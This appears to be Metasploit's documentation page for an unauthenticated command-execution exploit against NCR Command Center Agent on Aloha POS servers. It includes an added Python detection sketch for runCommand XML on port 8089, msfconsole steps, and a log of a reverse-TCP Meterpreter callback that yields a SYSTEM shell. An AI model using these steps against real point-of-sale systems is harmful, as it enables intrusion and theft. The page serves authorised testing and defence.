GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/misc/ncr_cmcagent_rce.md

Vulnerable Application

CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only on devices with a certain "misconfiguration."

Successfully tested against NCR Command Center Agent 16.2.1.1.
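For defenders, the description above gives two observable facts: the agent listens on port 8089, and the dangerous request is an XML document carrying a runCommand parameter. The following detection sketch is an added example, not code from the Metasploit module or from NCR; the record layout `(src_ip, dst_port, payload)` and the XML shapes in the sample data are constructed placeholders, since the page does not show the agent's real message schema.

```python
import re
import xml.etree.ElementTree as ET

AGENT_PORT = 8089          # port named in the description above
NEEDLE = "runcommand"      # parameter name from the description, lower-cased

def run_command_hits(payload: bytes) -> list[str]:
    """Return where 'runCommand' appears in an XML payload (empty list = clean)."""
    text = payload.decode("utf-8", errors="replace")
    # Never hand DTDs or entities from untrusted traffic to the parser.
    if re.search(r"<!(DOCTYPE|ENTITY)", text, re.I):
        return ["raw:dtd-present"] if NEEDLE in text.lower() else []
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        # Malformed XML still counts if the parameter name is present.
        return ["raw:unparsed"] if NEEDLE in text.lower() else []
    hits = []
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1]              # drop any namespace part
        if tag.lower() == NEEDLE:
            hits.append(f"element:{tag}")
        for name, value in el.attrib.items():
            local = name.rsplit("}", 1)[-1]
            if NEEDLE in (local.lower(), value.strip().lower()):
                hits.append(f"attribute:{tag}@{local}")
    return hits

def triage(records):
    """records: iterable of (src_ip, dst_port, payload); returns (src_ip, hits) alerts."""
    alerts = []
    for src, port, payload in records:
        hits = run_command_hits(payload) if port == AGENT_PORT else []
        if hits:
            alerts.append((src, hits))
    return alerts

# Constructed sample traffic; the XML shapes are placeholders, not the agent's real schema.
SAMPLE = [
    ("10.0.0.5", 8089, b"<msg><status>ok</status></msg>"),
    ("10.0.0.9", 8089, b"<msg><runCommand>placeholder</runCommand></msg>"),
    ("10.0.0.7", 8089, b'<msg><param name="RunCommand" value="placeholder"/></msg>'),
    ("10.0.0.8", 8089, b"<msg><runCommand>truncated"),
    ("10.0.0.9", 443, b"<msg><runCommand>placeholder</runCommand></msg>"),
]

if __name__ == "__main__":
    for src, hits in triage(SAMPLE):
        print(f"ALERT {src} -> :{AGENT_PORT} {hits}")
```

Any alert from a source that is not the site's management server is worth investigating, and port 8089 on POS/BOH hosts should not be reachable from untrusted networks in the first place.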

Install

The original link is https://rdf2.alohaenterprise.com/client/CMCInst.zip. Since the URL was inaccessible, the file was downloaded using the Web Archive. Here’s the final URL:

https://web.archive.org/web/20210129020048/https://rdf2.alohaenterprise.com/client/CMCInst.zip

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use windows/misc/ncr_cmcagent_rce

  4. Do: set rhosts [ip]

  5. Do: set lhost [ip]

  6. Do: run

  7. You should get a shell.

Options

Scenarios

msf > use windows/misc/ncr_cmcagent_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf exploit(windows/misc/ncr_cmcagent_rce) > set LHOST 192.168.2.107
LHOST => 192.168.2.107
msf exploit(windows/misc/ncr_cmcagent_rce) > set RHOSTS 192.168.2.106
RHOSTS => 192.168.2.106
msf exploit(windows/misc/ncr_cmcagent_rce) > exploit
[*] Started reverse TCP handler on 192.168.2.107:4444
[*] 192.168.2.106:8089 - Generating payload
[*] 192.168.2.106:8089 - Check your shell
[*] Sending stage (177734 bytes) to 192.168.2.106
[*] Meterpreter session 1 opened (192.168.2.107:4444 -> 192.168.2.106:49849) at 2025-10-23 05:38:45 -0400

meterpreter > shell
Process 5188 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19044.4529]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system